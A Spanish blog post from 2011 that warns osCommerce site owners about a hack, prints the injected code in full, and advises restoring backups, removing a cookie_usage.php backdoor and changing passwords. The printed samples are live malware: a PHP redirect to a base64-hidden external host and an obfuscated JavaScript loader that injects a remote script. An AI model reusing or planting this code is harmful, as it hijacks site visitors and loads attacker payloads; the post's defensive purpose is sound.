2011-04-07

if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode('

Si encuentras un código como éste en tu sitio:

?php if(!isset($tf['engine'])){$tf['engine']=1;$tf['s']=base64_decode('a2hjb2wuY29t');$tf['u']='http://'.$tf['s'].'/page/';$tf['r']="?ref=".base64_encode('http://'.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']);if(!isset($_GET['rf'])){if(!@headers_sent()){@header("HTTP/1.1 302 Moved Temporarily");@header("Location: ".$tf['u'].$tf['r']);}echo "

Page Moved

The page you are trying to open has been moved.

Use the navigation links on the right of this page, the search box at the top, or the site map link below to find the new location of the page you're seeking.

Click the link below to follow new url.

".$tf['u']."";echo "";exit;}} ?

Es la hora de que pases por el informático experto en seguridad más cercano a tu domicilio

Lo más normal es que te hayan introducido este código en todos los archivos php de tu sitio.

En cambio en los archivos html y js te habrán inroducido este otro código:

if (typeof(redef_colors)=="undefined") {

var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a77', '#727e7b', '#3d727e', '#7c3e7f', '#707674', '#3e7982', '#3d7f77', '#7f314d');
var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {
var s = "";
for (j=0;j var c_rgb = t[j];
for (i=1;i<7;i++) {
var c_clr = c_rgb.substr(i++,2);
if (c_clr!="00") s += String.fromCharCode(parseInt(c_clr,16)-15);
}
}
if (styled) {
s = s.substr(0,36) + s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime() + s.substr((s.length-2));
} else {
s = s.substr(36,(s.length-38)) + div_colors[1].substr(0,1)+new Date().getTime();
}
return s;
}

function try_pick_colors() {
try {
if(!document.getElementById || !document.createElement){
document.write(div_pick_colors(div_colors,1));
} else {
var new_cstyle=document.createElement("script");
new_cstyle.type="text/javascript";
new_cstyle.src=div_pick_colors(div_colors,0);
document.getElementsByTagName("head")[0].appendChild(new_cstyle);
}
} catch(e) { }
try {
check_colors_picked();
} catch(e) {
setTimeout("try_pick_colors()", 500);
}
}

try_pick_colors();

}


La mayoría de estos hackeos se deben a fallos de seguridad en las consultas a la base de datos de oscommerce. Después colocan un archivo infectado (backdoor) que les permite entrar al sitio y modificar todo lo que quieran. Suele llamarse cookie_usage.php.

La solución más idónea es subir un backup. La otra solución es eliminar archivo a archivo toda la infección y en los dos casos mejorar toda la seguridad y cambiar las contraseñas de todo.

El precio de una desinfección de este estilo suele estar por unos 300 euros con garantía de 3 meses. Nadie es invulnerable hasta el fin de los tiempos.

Da miedo la voracidad de toda esta gente dedicada a hacer el mal:

Click the link below to follow new url. http: //khcol. com /page/
Publicado por en
Etiquetas:

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)